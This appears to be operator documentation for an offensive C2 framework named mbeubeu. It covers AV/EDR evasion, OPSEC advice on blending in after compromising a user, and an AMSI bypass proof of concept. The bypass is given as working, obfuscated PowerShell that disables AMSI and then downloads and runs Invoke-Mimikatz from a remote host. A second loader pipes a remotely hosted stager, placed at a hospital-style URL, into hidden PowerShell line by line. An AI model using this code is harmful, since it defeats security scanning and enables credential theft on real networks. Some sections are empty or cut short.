Note on AV/EDR Evasion

The mbeubeu project does not claim to provide 100% undetectable payloads against all antivirus (AV) and endpoint detection and response (EDR) solutions. Like other C2 frameworks, mbeubeu is designed with interoperability in mind, offering the flexibility to integrate with external tools and techniques focused on AV/EDR evasion.

For instance:

Ultimately, evasion is the operator's responsibility. mbeubeu provides the base payloads, but it is up to the operator to ensure their payloads are stealthy and appropriate for the target environment. AV/EDR evasion requires ongoing adaptation and creativity; no framework alone can guarantee stealth.


OPSEC

Perfect OPSEC does not exist. A `whoami` at the wrong time is a beacon. Every action during an operation carries a detection risk; the only questions are how loud it is, when you do it, and how you cover your tracks.

Even a simple `whoami` can trigger alerts in hardened environments if it is executed by a non-allowlisted process or at odd hours. Once you compromise a user, your access becomes your disguise: your commands must reflect the role of the compromised user.
When someone outside IT runs `ipconfig`, the hunt starts. 👀


The AMSI bypass technique used in tools like `pwsploit` and `pwsh-execute` is simple yet powerful.

Traditional bypasses using Matt Graeber's method (e.g., `[Ref].Assembly.GetType(...)`) are often detected by AMSI when executed on a single line.

However, by splitting the bypass into multiple lines and executing each line in the **same** PowerShell process, AMSI scanning is delayed until after the bypass takes effect.

== PoC ==

opsec AMSI bypass PoC


== Real-World Example ==

Suppose your stager is hosted at: https://us.hospital.org/patients

Your remote script could include:

```powershell
$a = [Ref].Assembly.GetType('Sys'+'tem.Manag'+'ement.Au'+'tomation.Am'+'siUtils')
$b = $a.GetField('ams'+'iInitF'+'ailed','NonP'+'ublic,St'+'atic')
$b.SetValue($null,$true)
iex (New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "privilege::debug"
```
Then load it line-by-line using:

```powershell
$file = (New-Object System.Net.WebClient).DownloadString('https://us.hospital.org/patients')
foreach ($line in $file) {
    $line | powershell -nop -w hidden
}
```
This delays AMSI enough to slip through.

OPSEC Considerations